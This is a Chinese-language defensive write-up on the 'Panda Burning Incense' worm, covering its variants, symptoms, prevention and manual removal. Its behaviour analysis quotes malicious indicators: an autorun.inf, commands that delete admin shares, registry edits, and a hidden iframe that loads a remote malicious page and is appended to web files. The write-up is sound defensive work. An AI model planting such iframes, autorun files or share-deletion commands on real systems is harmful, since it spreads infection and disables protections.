“熊猫烧香”病毒防御和解决方案

一、病毒描述：
　　 “武汉男生”，俗称“熊猫烧香”，这是一个感染型的蠕虫病毒，它能感染系统中exe，com，pif，src，html，asp等文件，它还能中止大量的反病毒软件进程并且会删除扩展名为gho的文件，（.gho为GHOST的备份文件），使用户的系统备份文件丢失。被感染的用户系统中所有.exe可执行文件全部被改成熊猫举着三根香的模样。

到目前为止,从大体上分,目前主要有四大变种：

A病毒
就是FuckJacks.exe进程，
将自身复制为%System32%\FuckJacks.exe,然后感染除特殊文件夹之外的文件夹中的可执行文件。

B病毒，就是spoclsv.exe进程
将自身复制为%System32%\Drivers\spoclsv.exe,感染时在 c 盘根目录下生成感染标记文件。

C病毒
不再感染用户系统中的可执行文件，而是感染用户系统中的脚本病毒(这样的危害更大);而且在每个感染后的文件夹中写下感染标记文件。同时对抗杀毒软件及专杀工具。

D病毒
最近才出现的一个变种，用户可执行文件时不再使用 A 和 B 版本中的直接捆绑感染。 用户中毒后可执行程序的图标不改变(a 和 b 版本感染后可执行文件的图标都变成熊猫烧香)，当感染该变种会在临时目录发现100个图标文件。还有其它一些变种，基本都是为了躲避查杀进行修改和下载不同的后门的版本。

二、中毒症状

1、感染其他应用程序的.exe文件，并改变图标，但不会感染微软操作系统自身的文件

2、删除GHOST文件(.gho后缀)

3、禁用进程管理器，禁用注册表

4、拷贝自身到所有驱动器根目录，命名为Setup.exe，并生成一个autorun.inf使得用户打开该盘运行病毒，并将这两个文件属性设置为隐藏、只读、系统

5、修改注册表，加载自启动，并禁止显示隐藏文件

6、通过IPC$共享跨机传染，弱密码或空密码的文件服务器就要遭殃了

7、禁用杀毒工具运行

三、预防措施

1、立即检查本机administrator组成员口令，一定放弃简单口令甚至空口令，安全的口令是字母数字特殊字符的组合，自己记得住，别让病毒猜到就行。
修改方法：右键单击“我的电脑”，选择管理，浏览到本地用户和组，在右边的窗中，选择具备管理员权限的用户名，单击右键，选择设置密码，输入新密码就行。

2、利用组策略，关闭所有驱动器的自动播放功能。

步骤：单击开始，运行，输入gpedit.msc，打开组策略编辑器，浏览到计算机配置，管理模板，系统，在右边的窗格中选择关闭自动播放，该配置缺省是未配置，在下拉框中选择所有驱动器，再选取已启用，确定后关闭。最后，在开始，运行中输入gpupdate，确定后，该策略就生效了。

3、修改文件夹选项，以查看不明文件的真实属性，避免无意双击骗子程序中毒。
步骤：打开资源管理器（按windows徽标键＋E），点工具菜单下文件夹选项，再点查看，在高级设置中，选择查看所有文件，取消隐藏受保护的操作系统文件，取消隐藏文件扩展名。

4、时刻保持操作系统获得最新的安全更新，建议连接内网WSUS服务器进行更新。

5、启用windows防火墙保护本地计算机。

四、查杀方法

熊猫烧香病毒变种A：病毒进程为“spoclsv.exe”

　　这是“熊猫烧香”早期变种之一，特别之处是“杀死杀毒软件”，最恶劣之处在于感染全盘.exe文件和删除.gho文件（Ghost的镜像文件）。

　　最有“灵感”的一招莫过于在所有htm/html/asp/php/jsp/aspx文件末尾添加一段代码来调用病毒。目前所有专杀工具及杀毒软件均不会修复此病毒行为。需要手动清除病毒添加的代码，且一定要清除。否则访问了有此代码的网页，又会感染。其他老一点的“熊猫烧香”spoclsv变种的病毒行为比此版本少。就不再单独列出。
　　

熊猫烧香病毒详细行为：

　　1.复制自身到系统目录下：

　　%System%\drivers\spoclsv.exe（“%System%”代表Windows所在目录，比如：C:\Windows）

　　不同的spoclsv.exe变种，此目录可不同。比如12月爆发的变种目录是：C:\WINDOWS\System32\Drivers\spoclsv.exe。

　　2.创建启动项：

　　[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
　　 "svcshare"="%System%\drivers\spoclsv.exe"

　　3.在各分区根目录生成病毒副本：
　　 X:\setup.exe
　　 X:\autorun.inf

　　autorun.inf内容：

　　[AutoRun]
　　 OPEN=setup.exe
　　 shellexecute=setup.exe
　　 shell\Auto\command=setup.exe

　　4.使用net share命令关闭管理共享：

　　cmd.exe /c net share X$ /del /y
　　 cmd.exe /c net share admin$ /del /y

　　5.修改“显示所有文件和文件夹”设置：

　　[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion
　　 \Explorer\Advanced\Folder\Hidden\SHOWALL]
　　 "CheckedValue"=dword:00000000

　　6.熊猫烧香病毒尝试关闭安全软件相关窗口（略，其中最过分的竟然包含icesword，真是人怕出名猪怕壮阿，呵呵）：

　　7.尝试结束安全软件相关进程以及Viking病毒（威金病毒）进程（略，可以用熊猫杀威金哦，呵呵）：

　　8.禁用安全软件相关服务：

　　9.删除安全软件相关启动项：

　　SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RavTask
　　 SOFTWARE\Microsoft\Windows\CurrentVersion\Run\KvMonXP
　　 SOFTWARE\Microsoft\Windows\CurrentVersion\Run\kav
　　 SOFTWARE\Microsoft\Windows\CurrentVersion\Run\KAVPersonal50
　　 SOFTWARE\Microsoft\Windows\CurrentVersion\Run\McAfeeUpdaterUI
　　 SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Network Associates Error Reporting Service
　　 SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ShStatEXE
　　 SOFTWARE\Microsoft\Windows\CurrentVersion\Run\YLive.exe
　　 SOFTWARE\Microsoft\Windows\CurrentVersion\Run\yassistse

　　10.遍历目录修改htm/html/asp/php/jsp/aspx等网页文件，在这些文件尾部追加信息：

　　<iframe src="hxxp://www.ctv163.com/wuhan/down.htm" width="0" height="0" frameborder="0"> </iframe>

　　但不修改以下目录中的网页文件（这些就是下文说的特殊文件夹啦，有什么重要文件资料可以寄放哦，呵呵）：

　　C:\WINDOWS
　　 C:\WINNT
　　 C:\system32
　　 C:\Documents and Settings
　　 C:\System Volume Information
　　 C:\Recycled
　　 Program Files\Windows NT
　　 Program Files\WindowsUpdate
　　 Program Files\Windows Media Player
　　 Program Files\Outlook Express
　　 Program Files\Internet Explorer
　　 Program Files\NetMeeting
　　 Program Files\Common Files
　　 Program Files\ComPlus Applications
　　 Program Files\Messenger
　　 Program Files\InstallShield Installation Information
　　 Program Files\MSN
　　 Program Files\Microsoft Frontpage
　　 Program Files\Movie Maker
　　 Program Files\MSN Gamin Zone

　　11.在访问过的目录下生成Desktop_.ini文件，内容为当前日期。

　　12.此外，病毒还会尝试删除GHO文件。

　　病毒还尝试使用弱密码将副本以GameSetup.exe的文件名复制到局域网内其它计算机中：（略，建议还是给系统加一个复杂一点的密码吧）
　　

病毒文件内含有这些信息：

　　whboy
　　 ***武*汉*男*生*感*染*下*载*者***

解决方案：

1. 结束病毒进程：

%System%\drivers\spoclsv.exe

不同的spoclsv.exe变种，此目录可不同。比如12月爆发的变种目录是：C:\WINDOWS\System32\Drivers\spoclsv.exe。但可用此方法清除。“%System%\system32\spoclsv.exe”是系统文件。（目前看来没有出现插入该系统进程的变种，不排除变种的手法变化。）查看当前运行spoclsv.exe的路径，可使用超级兔子魔法设置。

2. 删除病毒文件：%System%\drivers\spoclsv.exe 请注意区分病毒和系统文件。详见步骤1。

3. 删除病毒启动项：

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
"svcshare"="%System%\drivers\spoclsv.exe"

4. 通过分区盘符右键菜单中的“打开”进入分区根目录，删除根目录下的病毒文件：

X:\setup.exe
X:\autorun.inf

5. 恢复被修改的“显示所有文件和文件夹”设置：

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL]
"CheckedValue"=dword:00000001

6. 修复或重新安装被破坏的安全软件。

7.修复被感染的程序。可用专杀工具进行修复。

8. 恢复被修改的网页文件，可以使用某些编辑网页的工具替换被添加文字为空。机器上有htm/html/asp/php/jsp/aspx等网页文件，一定要删除此段代码。有危险代码的网页一但发布到网页可能会感染其他用户。